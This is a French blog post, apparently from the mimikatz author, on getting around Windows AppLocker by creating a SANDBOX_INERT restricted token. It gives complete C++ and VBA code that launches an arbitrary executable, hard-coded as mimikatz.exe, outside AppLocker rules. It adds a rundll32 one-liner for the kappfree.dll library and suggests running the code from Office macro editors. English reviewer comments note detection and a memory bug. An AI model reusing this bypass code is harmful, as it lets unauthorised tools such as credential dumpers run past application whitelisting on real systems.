Ce n’est pas une découverte, le moyen de contourner AppLocker est documenté par Microsoft via la fonction CreateRestrictedToken
: http://msdn.microsoft.com/library/aa446583.aspx
SANDBOX_INERT 0x2
If this value is used, the system does not check AppLocker rules or apply Software Restriction Policies. For AppLocker, this flag disables checks for all four rule collections: Executable, Windows Installer, Script, and DLL.
… original …
Voici un petit exemple de code pour lancer vos exécutables (même sans être administrateur…), avec la ligne de commande contenue dans la variable lpszCmdLine
:
// Launches the command line held in lpszCmdLine (declared outside this snippet)
// under a copy of the caller's own primary token created with SANDBOX_INERT.
// Per the CreateRestrictedToken documentation quoted above, a token carrying
// that flag is not checked against AppLocker rules or Software Restriction
// Policies. No elevation is involved: the new token is derived from the
// current process's token via CreateRestrictedToken, which can only narrow it.
//
// Reviewer notes (defensive):
//  - The sandbox-inert state is a queryable token attribute
//    (GetTokenInformation with TokenSandBoxInert), so a process created this
//    way is distinguishable from an ordinary one when auditing tokens.
//  - NOTE(review): this reflects the Windows releases the text was written
//    against; later releases are documented as honouring SANDBOX_INERT only
//    when the caller holds SeTcbPrivilege - confirm against the current
//    CreateRestrictedToken reference before relying on either claim.
//  - Every failure path below is silent: nothing reports GetLastError().
HANDLE monToken;
// Access rights needed to duplicate the token and assign the copy as a primary token.
if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY, &monToken))
{
    HANDLE monSuperToken;
    // No SIDs disabled, no privileges deleted, no restricting SIDs: the only
    // difference from monToken is the SANDBOX_INERT flag.
    if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken))
    {
        PROCESS_INFORMATION mesInfosProcess;
        ZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION));
        STARTUPINFO mesInfosDemarrer;
        ZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO));
        // cb must hold the structure size; every other field is left zeroed.
        mesInfosDemarrer.cb = sizeof(STARTUPINFO);
        // Writable copy: the Unicode CreateProcessAsUser is documented as
        // possibly modifying the lpCommandLine buffer.
        // NOTE(review): the returned pointer is not checked for NULL before use.
        wchar_t * commandLine = _wcsdup(lpszCmdLine);
        // Handles are not inherited (false); the child gets its own console.
        if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess))
        {
            // Only the handles are released here; the child keeps running.
            CloseHandle(mesInfosProcess.hThread);
            CloseHandle(mesInfosProcess.hProcess);
        }
        // NOTE(review): _wcsdup allocates with malloc; releasing the buffer with
        // delete[] mismatches the allocator (undefined behaviour) - free() is the
        // matching call.
        delete[] commandLine;
        CloseHandle(monSuperToken);
    }
    CloseHandle(monToken);
}
Et parce que les librairies sont rarement interdites, il y a dans le package de mimikatz une nouvelle librairie (qui ne s’injecte pas ;)) pour lancer des programmes malgré AppLocker.
Elle peut s’utiliser directement via rundll32
:
rundll32 kappfree.dll,start mimikatz
le programme appelé peut être différent de mimikatz
Si vraiment cela ne suffit pas…
…vous pouvez toujours vous amuser dans l’éditeur VBA d’Excel, Word… ;)
modifier la variable commandLine...
' Declarations for the VBA port of the C++ snippet above: Win32 imports,
' constants and the two structures CreateProcessAsUser needs. The commented
' prototypes (') are the SAL-annotated C signatures each Declare mirrors.
' All handles and pointers are declared as 32-bit Long - assumes a 32-bit
' VBA host; TODO confirm.
Option Explicit

'WINBASEAPI __out Handle WINAPI GetCurrentProcess(VOID);
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long

'WINBASEAPI BOOL WINAPI CloseHandle( __in HANDLE hObject );
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Boolean

' Access rights requested from OpenProcessToken (same mask as the C++ version).
Private Const TOKEN_ASSIGN_PRIMARY = &H1
Private Const TOKEN_DUPLICATE = &H2
Private Const TOKEN_QUERY = &H8

'WINADVAPI BOOL WINAPI OpenProcessToken ( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle );
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Boolean

' The flag documented (quote above) as disabling AppLocker / SRP checks for the
' resulting token.
Private Const SANDBOX_INERT = &H2

'WINADVAPI BOOL APIENTRY CreateRestrictedToken( __in HANDLE ExistingTokenHandle, __in DWORD Flags, __in DWORD DisableSidCount, __in_ecount_opt(DisableSidCount) PSID_AND_ATTRIBUTES SidsToDisable, __in DWORD DeletePrivilegeCount, __in_ecount_opt(DeletePrivilegeCount) PLUID_AND_ATTRIBUTES PrivilegesToDelete, __in DWORD RestrictedSidCount, __in_ecount_opt(RestrictedSidCount) PSID_AND_ATTRIBUTES SidsToRestrict, __deref_out PHANDLE NewTokenHandle);
' The optional pointer parameters are declared ByRef Long so that a caller can
' pass "ByVal 0&" to hand the API a NULL pointer.
Private Declare Function CreateRestrictedToken Lib "advapi32" (ByVal ExistingTokenHandle As Long, ByVal Flags As Long, ByVal DisableSidCount As Long, ByRef SidsToDisable As Long, ByVal DeletePrivilegeCount As Long, ByRef PrivilegesToDelete As Long, ByVal RestrictedSidCount As Long, ByRef SidsToRestrict As Long, ByRef NewTokenHandle As Long) As Boolean

' Mirror of the Win32 STARTUPINFO layout; only cb is filled in by the caller.
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Mirror of the Win32 PROCESS_INFORMATION layout (output of CreateProcessAsUser).
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type
' Creation flag passed to CreateProcessAsUser: the child gets its own console.
Private Const CREATE_NEW_CONSOLE = &H10

'WINADVAPI BOOL WINAPI CreateProcessAsUserA (__in_opt HANDLE hToken, __in_opt LPCSTR lpApplicationName, __inout_opt LPSTR lpCommandLine, __in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes, __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in BOOL bInheritHandles, __in DWORD dwCreationFlags, __in_opt LPVOID lpEnvironment, __in_opt LPCSTR lpCurrentDirectory, __in LPSTARTUPINFOA lpStartupInfo, __out LPPROCESS_INFORMATION lpProcessInformation);
' Bound to the ANSI variant explicitly, matching the String parameters below.
Private Declare Function CreateProcessAsUser Lib "advapi32" Alias "CreateProcessAsUserA" (ByVal hToken As Long, ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByRef lpProcessAttributes As Long, ByRef lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByRef lpEnvironment As Long, ByVal lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean

' VBA equivalent of the C++ snippet above (named after the kappfree library
' mentioned in the text): copy the host process's own token with SANDBOX_INERT
' and start the hard-coded command line under that copy. No elevation is
' involved; the new token is derived from the caller's token.
'
' Reviewer notes (defensive):
'  - The sandbox-inert state is a queryable token attribute
'    (GetTokenInformation with TokenSandBoxInert), which makes a process
'    started this way distinguishable when auditing tokens.
'  - NOTE(review): later Windows releases are documented as honouring
'    SANDBOX_INERT only when the caller holds SeTcbPrivilege - confirm against
'    the current CreateRestrictedToken reference.
'  - Only the CreateProcessAsUser failure is reported; OpenProcessToken and
'    CreateRestrictedToken failures are silent.
Private Sub kappfree()
    Dim monToken As Long
    If (OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY Or TOKEN_DUPLICATE Or TOKEN_QUERY, monToken)) Then
        Dim monSuperToken As Long
        ' No SIDs disabled, no privileges deleted, no restricting SIDs ("ByVal 0&"
        ' passes NULL for each optional array): only the flag differs from monToken.
        If (CreateRestrictedToken(monToken, SANDBOX_INERT, 0, ByVal 0&, 0, ByVal 0&, 0, ByVal 0&, monSuperToken)) Then
            Dim mesInfosProcess As PROCESS_INFORMATION
            Dim mesInfosDemarrer As STARTUPINFO
            ' cb is the structure-size field the API expects.
            mesInfosDemarrer.cb = Len(mesInfosDemarrer)
            Dim commandLine As String
            ' Hard-coded target; the surrounding text says to change this variable.
            commandLine = "f:\mimikatz.exe"
            ' commandLine$ is the same variable with the String type suffix.
            ' Handles are not inherited (False); no custom environment or directory.
            If (CreateProcessAsUser(monSuperToken, vbNullString, commandLine$, ByVal 0&, ByVal 0&, False, CREATE_NEW_CONSOLE, ByVal 0&, vbNullString, mesInfosDemarrer, mesInfosProcess)) Then
                ' Only the handles are released; the child keeps running.
                CloseHandle mesInfosProcess.hThread
                CloseHandle mesInfosProcess.hProcess
            Else
                MsgBox "Erreur CreateProcessAsUser : " & Err.LastDllError
            End If
            CloseHandle monSuperToken
        End If
        CloseHandle monToken
    End If
End Sub